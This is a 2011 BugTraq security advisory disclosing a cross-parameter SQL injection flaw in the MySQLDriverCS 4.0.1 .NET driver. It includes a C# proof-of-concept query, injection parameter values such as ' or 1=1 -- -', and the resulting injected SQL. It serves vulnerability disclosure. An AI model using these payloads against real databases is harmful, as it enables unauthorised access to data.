BugTraq
MySQLDriverCS Cross-Parameter SQL Injection Vulnerability Jun 27 2011 12:48PM
vuln nipc org cn
Background:
MySQLDriverCS is a free simple .NET compliant MySQL driver. Made in C# but it would be used in all .NET compatible languages (VB.NET, Managed C++,...). It is one of the most common used .NET MySQL drivers. This project was developed by M.L. Vias Livschitz in collaboration with CeDEI, Ramon Llull University, Barcelona, Spain.

Discription:
A critical vulnerability found in the latest version, MySQLDriverCS 4.0.1, can cause a cross-parameter SQL injection attack which directly circumvents the protection of parameterized query mechanism in the MySQLDriverCS, and all the applications which use MySQLDriverCS are likely vulnerable to this attack. The cross-parameter SQL injection vulnerability is due to the function ?BindParameters? in the class ?DirectStatement? of the file ?Statement.cs?. When assigning value to each parameter for a query statement, The ?Replace? function is used so as to all the same string in the statement will be replaced by the value of the corresponding parameter.
MySQLDriverCS 4.0.1 and all the previous versions which support the parameterized query mechanism are vulnerable to the cross-parameter SQL injection.

POC example:
There is an example for illustrating the attack against the vulnerability:
----------------------------------------------------------------------
DataTable dt = new DataTable();
MySQLConnection conn = new MySQLConnection(CONN_STRING);
MySQLDataAdapter Cmd = new MySQLDataAdapter();
string sCmdText = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
Cmd.SelectCommand = new MySQLCommand(sCmdText, conn);
Cmd.SelectCommand.Connection.Open();
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sFileName", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sFileName"].Value = sFileName;
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sLanguage", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sLanguage"].Value = sLanguage;
Cmd.Fill(dt);
Cmd.SelectCommand.Connection.Close();
----------------------------------------------------------------------

Assigning (one parameter is assigned with SQL injection attack vector, while another one is assigned with a string which contains the parameter name of the first.):
----------------------------------------------------------------------
@sFileName: " or 1=1 -- -"
@sLanguage: "cn@sFileName"
----------------------------------------------------------------------

Then, the final sql query statement executed by Mysql is as following:
----------------------------------------------------------------------
SELECT * FROM filelist where FILENAME=' or 1=1 -- -' AND LANGUAGE='cn' or 1=1 -- -''
----------------------------------------------------------------------
Of course, we should use two parameters to launch a cross-parameter SQL injection attack.

Timeline:
12. June 2011 - Bug found.
19. June 2011 - Author contacted. There is no response to my post so far (2011-06-27).
27. June 2011 - Full disclosure.

Credit:
This vulnerability was found by Qihan Luo who is from the National Computer Network Intrution Protection Center, Graduate University of Chinese Academy of Sciences, Beijing, China.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus